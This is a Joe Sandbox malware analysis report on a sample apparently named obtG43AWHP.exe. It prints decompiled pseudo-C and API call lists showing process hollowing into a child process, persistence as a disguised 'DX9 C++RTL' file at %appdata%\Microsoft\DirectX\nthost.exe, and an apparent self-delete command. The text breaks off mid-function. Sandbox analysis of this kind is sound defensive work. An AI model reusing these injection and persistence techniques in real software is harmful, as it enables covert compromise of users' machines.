    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_16_2_400000_obtG43AWHP.jbxd
    Function 004179B4, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 9
    C-Code - Quality: 100%
    			E004179B4(void* __eax) {
				void* _t3;

				L0040C518();
				if(__eax != 0) {
					_t3 = E0040A56C("WSACleanup", 1);
					E0040386C();
					return _t3;
				}
				return __eax;
			}




    0x004179b4
    0x004179bb
    0x004179c9
    0x004179ce
    0x00000000
    0x004179ce
    0x004179d3

    APIs
    • WSACleanup.WSOCK32(00417A06,00000000,00417A14), ref: 004179B4
    Strings
    Memory Dump Source
    • Source File: 00000010.00000002.1534525531.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_16_2_400000_obtG43AWHP.jbxd
    Function 0040F0A8, Relevance: 5.1, Strings: 4, Instructions: 85
    C-Code - Quality: 78%
    			E0040F0A8(signed int __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
				void* _v8;
				char _v264;
				char _v520;
				char _v524;
				signed char _t47;
				intOrPtr* _t59;
				intOrPtr _t61;
				intOrPtr* _t75;
				void* _t78;

				_v524 = 0;
				_t75 = __edx;
				_t47 = __eax;
				_push(_t78);
				_push(0x40f1ce);
				_push( *[fs:eax]);
				 *[fs:eax] = _t78 + 0xfffffdf8;
				_t73 = __eax & 0x00000fff;
				if((__eax & 0x00000fff) > 0x14) {
					if(__eax != 0x100) {
						if(__eax != 0x101) {
							if(E0040F504(__eax,  &_v8) == 0) {
								E00407110( &_v524, 4);
								_t59 =  *0x4530ec; // 0x419128
								E00404194(_t75, _v524,  *_t59);
							} else {
								E00403064( *_v8,  &_v520);
								E004027B4( &_v520, 0x7fffffff, 2,  &_v264);
								E004040EC(__edx,  &_v264);
							}
						} else {
							E00403EDC(__edx, 0x40f1f4);
						}
					} else {
						E00403EDC(__edx, "String");
					}
				} else {
					E00403EDC(__edx,  *((intOrPtr*)(0x419358 + (_t73 & 0x0000ffff) * 4)));
				}
				if((_t47 & 0x00000020) != 0) {
					E00404194(_t75,  *_t75, "Array ");
				}
				if((_t47 & 0x00000040) != 0) {
					E00404194(_t75,  *_t75, "ByRef ");
				}
				_pop(_t61);
				 *[fs:eax] = _t61;
				_push(E0040F1D5);
				return E00403E88( &_v524);
			}












    0x0040f0b6
    0x0040f0bc
    0x0040f0be
    0x0040f0c2
    0x0040f0c3
    0x0040f0c8
    0x0040f0cb
    0x0040f0d0
    0x0040f0d9
    0x0040f0f6
    0x0040f10e
    0x0040f12a
    0x0040f175
    0x0040f180
    0x0040f18a
    0x0040f12c
    0x0040f13e
    0x0040f153
    0x0040f160
    0x0040f160
    0x0040f110
    0x0040f117
    0x0040f117
    0x0040f0f8
    0x0040f0ff
    0x0040f0ff
    0x0040f0db
    0x0040f0e7
    0x0040f0e7
    0x0040f192
    0x0040f19d
    0x0040f19d
    0x0040f1a5
    0x0040f1b0
    0x0040f1b0
    0x0040f1b7
    0x0040f1ba
    0x0040f1bd
    0x0040f1cd

    Strings
    Memory Dump Source
    • Source File: 00000010.00000002.1534525531.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_16_2_400000_obtG43AWHP.jbxd
    Function 0041381C, Relevance: 5.1, Strings: 4, Instructions: 71
    C-Code - Quality: 82%
    			E0041381C(intOrPtr __eax, void* __ebx, char* __edx, void* __edi, void* __esi) {
				intOrPtr _v8;
				char _v12;
				char* _t15;
				char* _t23;
				intOrPtr _t30;
				char _t31;
				intOrPtr _t39;
				intOrPtr _t42;
				void* _t45;

				_v12 = 0;
				_t23 = __edx;
				_push(_t45);
				_push(0x4138c2);
				_push( *[fs:eax]);
				 *[fs:eax] = _t45 + 0xfffffff8;
				_v8 = 0;
				if(__edx != 0) {
					_t39 = __eax;
					while( *_t23 != 0) {
						_t15 = _t23;
						while(1) {
							_t31 =  *_t23;
							if(_t31 == 0 || _t31 + 0xd3 - 2 < 0) {
								break;
							}
							_t23 = _t23 + 1;
						}
						E00403F78( &_v12, _t23 - _t15, _t15);
						_t42 = E004165D4(_t39, _t23 - _t15, _v12);
						if(_t42 == 0 && E00406E50(_v12, 0x4138dc) != 0) {
							_t42 = _t39;
						}
						if(_t42 != 0) {
							if( *_t23 == 0x2e) {
								_t23 = _t23 + 1;
							}
							if( *_t23 == 0x2d) {
								_t23 = _t23 + 1;
							}
							if( *_t23 == 0x3e) {
								_t23 = _t23 + 1;
							}
							_t39 = _t42;
							continue;
						}
						goto L19;
					}
					_v8 = _t39;
				}
				L19:
				_pop(_t30);
				 *[fs:eax] = _t30;
				_push(E004138C9);
				return E00403E88( &_v12);
			}












    0x00413827
    0x0041382a
    0x00413830
    0x00413831
    0x00413836
    0x00413839
    0x0041383e
    0x00413843
    0x00413845
    0x004138a4
    0x00413849
    0x0041384e
    0x0041384e
    0x00413852
    0x00000000
    0x00000000
    0x0041384d
    0x0041384d
    0x00413864
    0x00413873
    0x00413877
    0x0041388a
    0x0041388a
    0x0041388e
    0x00413893
    0x00413895
    0x00413895
    0x00413899
    0x0041389b
    0x0041389b
    0x0041389f
    0x004138a1
    0x004138a1
    0x004138a2
    0x00000000
    0x004138a2
    0x00000000
    0x0041388e
    0x004138a9
    0x004138a9
    0x004138ac
    0x004138ae
    0x004138b1
    0x004138b4
    0x004138c1

    Strings
    Memory Dump Source
    • Source File: 00000010.00000002.1534525531.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_16_2_400000_obtG43AWHP.jbxd
    Function 0041498C, Relevance: 5.0, Strings: 4, Instructions: 50
    C-Code - Quality: 96%
    			E0041498C(void* __eax, void* __ecx, void* __edx) {
				signed int _t7;
				void* _t8;
				void* _t17;
				void* _t29;

				_push(__ecx);
				_t29 = __edx;
				_t17 = __eax;
				_t7 = E004155CC(__ecx) & 0x0000007f;
				if(_t7 > 0xd) {
					L7:
					_t8 = E00413A2C();
				} else {
					_t1 = _t7 + E004149B3; // 0x5
					switch( *((intOrPtr*)( *_t1 * 4 +  &M004149C1))) {
						case 0:
							goto L7;
						case 1:
							E00413F54(_t17, 1, _t30);
							E00403F78(_t29,  *_t30, 0);
							_t8 = E00413F54(_t17,  *_t30, E004043A0(_t29));
							goto L8;
						case 2:
							__eax = __esi;
							__edx = 0x414a58;
							__eax = E00403EDC(__esi, 0x414a58);
							goto L8;
						case 3:
							__eax = __esi;
							__edx = 0x414a68;
							__eax = E00403EDC(__esi, 0x414a68);
							goto L8;
						case 4:
							__eax = __esi;
							__edx = 0x414a78;
							__eax = E00403EDC(__esi, 0x414a78);
							goto L8;
						case 5:
							__eax = __esi;
							__edx = 0x414a84;
							__eax = E00403EDC(__esi, 0x414a84);
							goto L8;
					}
				}
				L8:
				return _t8;
			}







    0x0041498e
    0x0041498f
    0x00414991
    0x0041499a
    0x004149a0
    0x00414a44
    0x00414a44
    0x004149a6
    0x004149a6
    0x004149ac
    0x00000000
    0x00000000
    0x00000000
    0x004149e2
    0x004149f0
    0x00414a05
    0x00000000
    0x00000000
    0x00414a0c
    0x00414a0e
    0x00414a13
    0x00000000
    0x00000000
    0x00414a1a
    0x00414a1c
    0x00414a21
    0x00000000
    0x00000000
    0x00414a28
    0x00414a2a
    0x00414a2f
    0x00000000
    0x00000000
    0x00414a36
    0x00414a38
    0x00414a3d
    0x00000000
    0x00000000
    0x004149ac
    0x00414a49
    0x00414a4c

    Strings
    Memory Dump Source
    • Source File: 00000010.00000002.1534525531.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_16_2_400000_obtG43AWHP.jbxd
    Function 0040AC28, Relevance: 5.0, Strings: 4, Instructions: 28
    C-Code - Quality: 100%
    			E0040AC28() {
				intOrPtr* _t5;
				intOrPtr* _t6;
				intOrPtr* _t7;
				intOrPtr* _t8;
				intOrPtr* _t9;
				intOrPtr _t12;
				intOrPtr _t13;
				intOrPtr _t16;
				intOrPtr* _t17;
				intOrPtr* _t18;

				_t12 =  *0x452f70; // 0x405e70
				 *0x45478c = E0040A628(_t12, 1);
				_t13 =  *0x453040; // 0x405ef0
				 *0x454790 = E0040A628(_t13, 1);
				_t5 =  *0x452f34; // 0x454008
				 *_t5 = 0x40a7a4;
				_t6 =  *0x452fa8; // 0x454004
				 *_t6 = E0040AC18;
				_t7 =  *0x452f64; // 0x45401c
				_t16 =  *0x406188; // 0x4061d4
				 *_t7 = _t16;
				_t8 =  *0x452f98; // 0x45400c
				 *_t8 = E0040A968;
				_t9 =  *0x452fac; // 0x454010
				 *_t9 = E0040AB4C;
				_t17 =  *0x453054; // 0x454020
				 *_t17 = E0040A8B4;
				_t18 =  *0x452f24; // 0x454028
				 *_t18 = E0040A8D0;
				return E0040A8D0;
			}













    0x0040ac28
    0x0040ac3a
    0x0040ac3f
    0x0040ac51
    0x0040ac56
    0x0040ac5b
    0x0040ac61
    0x0040ac66
    0x0040ac6c
    0x0040ac71
    0x0040ac77
    0x0040ac79
    0x0040ac7e
    0x0040ac84
    0x0040ac89
    0x0040ac94
    0x0040ac9a
    0x0040aca1
    0x0040aca7
    0x0040aca9

    Strings
    Memory Dump Source
    • Source File: 00000010.00000002.1534525531.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_16_2_400000_obtG43AWHP.jbxd

    Analysis Process: obtG43AWHP.exe PID: 3352 Parent PID: 3340

    Executed Functions

    Function 0037E080, Relevance: 16.7, APIs: 11, Instructions: 244
    APIs
    • VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 0037E0C6
    • GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 0037E0DC
    • CreateProcessA.KERNEL32(?,00000000), ref: 0037E1C2
    • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 0037E1F0
    • ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 0037E235
    • VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 0037E271
    • NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 0037E297
    • NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 0037E306
    • WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 0037E32C
    • SetThreadContext.KERNEL32(00000000,?), ref: 0037E34E
    • ResumeThread.KERNELBASE(00000000), ref: 0037E35A
    Memory Dump Source
    • Source File: 00000011.00000002.1543232621.0037D000.00000040.sdmp, Offset: 0037D000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_17_2_37d000_obtG43AWHP.jbxd
    Function 0037E380, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 113
    APIs
    • CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 0037E493
    • PostMessageA.USER32(00000000,00000400,00000064,000001F4), ref: 0037E4B6
      • Part of subcall function 0037E080: VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 0037E0C6
      • Part of subcall function 0037E080: GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 0037E0DC
      • Part of subcall function 0037E080: CreateProcessA.KERNEL32(?,00000000), ref: 0037E1C2
      • Part of subcall function 0037E080: VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 0037E1F0
    Strings
    Memory Dump Source
    • Source File: 00000011.00000002.1543232621.0037D000.00000040.sdmp, Offset: 0037D000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_17_2_37d000_obtG43AWHP.jbxd
    Function 0037E510, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35
    APIs
    • GetFileAttributesA.KERNELBASE(apfHQ), ref: 0037E54C
      • Part of subcall function 0037E380: CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 0037E493
      • Part of subcall function 0037E380: PostMessageA.USER32(00000000,00000400,00000064,000001F4), ref: 0037E4B6
    Strings
    Memory Dump Source
    • Source File: 00000011.00000002.1543232621.0037D000.00000040.sdmp, Offset: 0037D000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_17_2_37d000_obtG43AWHP.jbxd

    Non-executed Functions

    Function 0037DFB2, Relevance: .1, Instructions: 61
    Memory Dump Source
    • Source File: 00000011.00000002.1543232621.0037D000.00000040.sdmp, Offset: 0037D000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_17_2_37d000_obtG43AWHP.jbxd

    Analysis Process: obtG43AWHP.exe PID: 3368 Parent PID: 3352

    Executed Functions

    Function 00404FC0, Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 184
    C-Code - Quality: 65%
    			E00404FC0(intOrPtr __eax) {
				intOrPtr _v8;
				void* _v12;
				char _v15;
				char _v17;
				char _v18;
				char _v22;
				int _v28;
				char _v289;
				long _t44;
				long _t61;
				long _t63;
				CHAR* _t70;
				CHAR* _t72;
				struct HINSTANCE__* _t78;
				struct HINSTANCE__* _t84;
				char* _t94;
				void* _t95;
				intOrPtr _t99;
				struct HINSTANCE__* _t107;
				void* _t110;
				void* _t112;
				intOrPtr _t113;

				_t110 = _t112;
				_t113 = _t112 + 0xfffffee0;
				_v8 = __eax;
				GetModuleFileNameA(0,  &_v289, 0x105);
				_v22 = 0;
				_t44 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
				if(_t44 == 0) {
					L3:
					_push(_t110);
					_push(0x4050c5);
					_push( *[fs:eax]);
					 *[fs:eax] = _t113;
					_v28 = 5;
					E00404E08( &_v289, 0x105);
					if(RegQueryValueExA(_v12,  &_v289, 0, 0,  &_v22,  &_v28) != 0 && RegQueryValueExA(_v12, E0040522C, 0, 0,  &_v22,  &_v28) != 0) {
						_v22 = 0;
					}
					_v18 = 0;
					_pop(_t99);
					 *[fs:eax] = _t99;
					_push(E004050CC);
					return RegCloseKey(_v12);
				} else {
					_t61 = RegOpenKeyExA(0x80000002, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
					if(_t61 == 0) {
						goto L3;
					} else {
						_t63 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Delphi\\Locales", 0, 0xf0019,  &_v12); // executed
						if(_t63 != 0) {
							_push(0x105);
							_push(_v8);
							_push( &_v289);
							L00401248();
							GetLocaleInfoA(GetThreadLocale(), 3,  &_v17, 5); // executed
							_t107 = 0;
							if(_v289 != 0 && (_v17 != 0 || _v22 != 0)) {
								_t70 =  &_v289;
								_push(_t70);
								L00401250();
								_t94 = _t70 +  &_v289;
								while( *_t94 != 0x2e && _t94 !=  &_v289) {
									_t94 = _t94 - 1;
								}
								_t72 =  &_v289;
								if(_t94 != _t72) {
									_t95 = _t94 + 1;
									if(_v22 != 0) {
										_push(0x105 - _t95 - _t72);
										_push( &_v22);
										_push(_t95);
										L00401248();
										_t107 = LoadLibraryExA( &_v289, 0, 2);
									}
									if(_t107 == 0 && _v17 != 0) {
										_push(0x105 - _t95 -  &_v289);
										_push( &_v17);
										_push(_t95);
										L00401248();
										_t78 = LoadLibraryExA( &_v289, 0, 2); // executed
										_t107 = _t78;
										if(_t107 == 0) {
											_v15 = 0;
											_push(0x105 - _t95 -  &_v289);
											_push( &_v17);
											_push(_t95);
											L00401248();
											_t84 = LoadLibraryExA( &_v289, 0, 2); // executed
											_t107 = _t84;
										}
									}
								}
							}
							return _t107;
						} else {
							goto L3;
						}
					}
				}
			}

























    0x00404fc1
    0x00404fc3
    0x00404fcb
    0x00404fdc
    0x00404fe1
    0x00404ffa
    0x00405001
    0x00405043
    0x00405045
    0x00405046
    0x0040504b
    0x0040504e
    0x00405051
    0x00405063
    0x00405086
    0x004050a6
    0x004050a6
    0x004050aa
    0x004050b0
    0x004050b3
    0x004050b6
    0x004050c4
    0x00405003
    0x00405018
    0x0040501f
    0x00000000
    0x00405021
    0x00405036
    0x0040503d
    0x004050cc
    0x004050d4
    0x004050db
    0x004050dc
    0x004050ef
    0x004050f4
    0x004050fd
    0x00405113
    0x00405119
    0x0040511a
    0x00405127
    0x0040512c
    0x0040512b
    0x0040512b
    0x0040513b
    0x00405143
    0x00405149
    0x0040514e
    0x0040515b
    0x0040515f
    0x00405160
    0x00405161
    0x00405176
    0x00405176
    0x0040517a
    0x00405193
    0x00405197
    0x00405198
    0x00405199
    0x004051a9
    0x004051ae
    0x004051b2
    0x004051b4
    0x004051c9
    0x004051cd
    0x004051ce
    0x004051cf
    0x004051df
    0x004051e4
    0x004051e4
    0x004051b2
    0x0040517a
    0x00405143
    0x004051ed
    0x00000000
    0x00000000
    0x00000000
    0x0040503d
    0x0040501f

    APIs
    • GetModuleFileNameA.KERNEL32(00000000,?,00000105,0000000B,00000000), ref: 00404FDC
    • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,0000000B,00000000), ref: 00404FFA
    • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,0000000B,00000000), ref: 00405018
    • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00405036
      • Part of subcall function 00404E08: GetModuleHandleA.KERNEL32(kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00404E25
      • Part of subcall function 00404E08: GetProcAddress.KERNEL32(00000000,GetLongPathNameA,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?), ref: 00404E36
      • Part of subcall function 00404E08: lstrcpyn.KERNEL32(?,?,?,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00404E66
      • Part of subcall function 00404E08: lstrcpyn.KERNEL32(?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019), ref: 00404ECA
      • Part of subcall function 00404E08: lstrcpyn.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001), ref: 00404EFF
      • Part of subcall function 00404E08: FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5), ref: 00404F12
      • Part of subcall function 00404E08: FindClose.KERNEL32(00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000), ref: 00404F1F
      • Part of subcall function 00404E08: lstrlen.KERNEL32(?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068), ref: 00404F2B
      • Part of subcall function 00404E08: lstrcpyn.KERNEL32(0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B), ref: 00404F5F
      • Part of subcall function 00404E08: lstrlen.KERNEL32(?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8), ref: 00404F6B
      • Part of subcall function 00404E08: lstrcpyn.KERNEL32(?,0000005C,?,?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?), ref: 00404F8D
    • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 0040507F
    • RegQueryValueExA.ADVAPI32(?,0040522C,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,004050C5,?,80000001), ref: 0040509D
    • RegCloseKey.ADVAPI32(?,004050CC,00000000,?,?,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 004050BF
    • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 004050DC
    • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 004050E9
    • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 004050EF
    • lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 0040511A
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405161
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405171
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405199
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 004051A9
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 004051CF
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?), ref: 004051DF
    Strings
    Memory Dump Source
    • Source File: 00000012.00000002.1543762025.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_2_400000_obtG43AWHP.jbxd
    Function 004050CC, Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 98
    C-Code - Quality: 61%
    			E004050CC() {
				void* _t28;
				void* _t30;
				struct HINSTANCE__* _t36;
				struct HINSTANCE__* _t42;
				char* _t51;
				void* _t52;
				struct HINSTANCE__* _t59;
				void* _t61;

				_push(0x105);
				_push( *((intOrPtr*)(_t61 - 4)));
				_push(_t61 - 0x11d);
				L00401248();
				GetLocaleInfoA(GetThreadLocale(), 3, _t61 - 0xd, 5); // executed
				_t59 = 0;
				if( *(_t61 - 0x11d) == 0 ||  *(_t61 - 0xd) == 0 &&  *((char*)(_t61 - 0x12)) == 0) {
					L14:
					return _t59;
				} else {
					_t28 = _t61 - 0x11d;
					_push(_t28);
					L00401250();
					_t51 = _t28 + _t61 - 0x11d;
					L5:
					if( *_t51 != 0x2e && _t51 != _t61 - 0x11d) {
						_t51 = _t51 - 1;
						goto L5;
					}
					_t30 = _t61 - 0x11d;
					if(_t51 != _t30) {
						_t52 = _t51 + 1;
						if( *((char*)(_t61 - 0x12)) != 0) {
							_push(0x105 - _t52 - _t30);
							_push(_t61 - 0x12);
							_push(_t52);
							L00401248();
							_t59 = LoadLibraryExA(_t61 - 0x11d, 0, 2);
						}
						if(_t59 == 0 &&  *(_t61 - 0xd) != 0) {
							_push(0x105 - _t52 - _t61 - 0x11d);
							_push(_t61 - 0xd);
							_push(_t52);
							L00401248();
							_t36 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
							_t59 = _t36;
							if(_t59 == 0) {
								 *((char*)(_t61 - 0xb)) = 0;
								_push(0x105 - _t52 - _t61 - 0x11d);
								_push(_t61 - 0xd);
								_push(_t52);
								L00401248();
								_t42 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
								_t59 = _t42;
							}
						}
					}
					goto L14;
				}
			}











    0x004050cc
    0x004050d4
    0x004050db
    0x004050dc
    0x004050ef
    0x004050f4
    0x004050fd
    0x004051e6
    0x004051ed
    0x00405113
    0x00405113
    0x00405119
    0x0040511a
    0x00405127
    0x0040512c
    0x0040512f
    0x0040512b
    0x00000000
    0x0040512b
    0x0040513b
    0x00405143
    0x00405149
    0x0040514e
    0x0040515b
    0x0040515f
    0x00405160
    0x00405161
    0x00405176
    0x00405176
    0x0040517a
    0x00405193
    0x00405197
    0x00405198
    0x00405199
    0x004051a9
    0x004051ae
    0x004051b2
    0x004051b4
    0x004051c9
    0x004051cd
    0x004051ce
    0x004051cf
    0x004051df
    0x004051e4
    0x004051e4
    0x004051b2
    0x0040517a
    0x00000000
    0x00405143

    APIs
    • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 004050DC
    • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 004050E9
    • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 004050EF
    • lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 0040511A
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405161
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405171
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405199
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 004051A9
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 004051CF
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?), ref: 004051DF
    Strings
    Memory Dump Source
    • Source File: 00000012.00000002.1543762025.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_2_400000_obtG43AWHP.jbxd
    Function 00418750, Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 164
    C-Code - Quality: 33%
    			E00418750(void* __ebx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				intOrPtr _v48;
				char _v52;
				int _v56;
				char _v60;
				char _v64;
				char _v68;
				char _v72;
				char* _t52;
				void* _t80;
				char* _t87;
				char* _t99;
				void* _t109;
				void* _t110;
				intOrPtr _t116;
				intOrPtr _t117;
				void* _t125;
				intOrPtr _t139;
				intOrPtr _t140;

				_t137 = __esi;
				_t136 = __edi;
				_t139 = _t140;
				_t110 = 8;
				do {
					_push(0);
					_push(0);
					_t110 = _t110 - 1;
				} while (_t110 != 0);
				_push(_t110);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_push(_t139);
				_push(0x418974);
				_push( *[fs:eax]);
				 *[fs:eax] = _t140;
				if(E00402944(__ebx, __esi) == 0) {
					E004029A4(0,  &_v12);
					ShellExecuteA(0, 0, E00404348(_v12), 0x418984, 0, 0);
					E00403D1C();
				}
				_push(_t139);
				_push(0x418925);
				_push( *[fs:eax]);
				 *[fs:eax] = _t140;
				E004029A4(1,  &_v16);
				_t109 = E00407138(_v16, 0);
				_t144 = _t109 - 0x10;
				if(_t109 == 0x10) {
					E00417D84("%appdata%\\Microsoft\\DirectX\\nthost.exe", _t109, _t110,  &_v8, _t136, _t137, _t144);
					E004186D0(_v8, _t109, _t110, _t144);
					E00406EFC("%appdata%\\Microsoft\\DirectX\\nthost.exe",  &_v24);
					E00417D84(_v24, _t109, _t110,  &_v20, _t136, _t137, _t144);
					_push(_v20);
					E00406EFC("DX9 C++RTL",  &_v28);
					_pop(_t125);
					E004185E8(_v28, _t109, _t125);
					E004029A4(0,  &_v36);
					E00406EFC(_v36,  &_v32);
					_push(_v32);
					E00406EFC("%appdata%\\Microsoft\\DirectX\\nthost.exe",  &_v44);
					E00417D84(_v44, _t109, _t110,  &_v40, _t136, _t137, 0);
					_pop(_t80);
					E00404294(_t80, _v40);
					if(0 == 0) {
						__eflags = 1;
						E00406FFC( &_v60);
						_t87 = E00404348(_v60);
						ShellExecuteA(0, 0, E00404348(_v8), _t87, 0, 1);
					} else {
						_push(1);
						_push(0);
						E00406FFC( &_v52);
						_push(_v52);
						_push(" DEL \"");
						E004029A4(0,  &_v56);
						E00404208();
						_t99 = E00404348(_v48);
						ShellExecuteA(0, 0, E00404348(_v8), _t99, E004189E4, _v56);
					}
					E00403D1C();
				}
				if(_t109 < 0x20) {
					E00406FFC( &_v64);
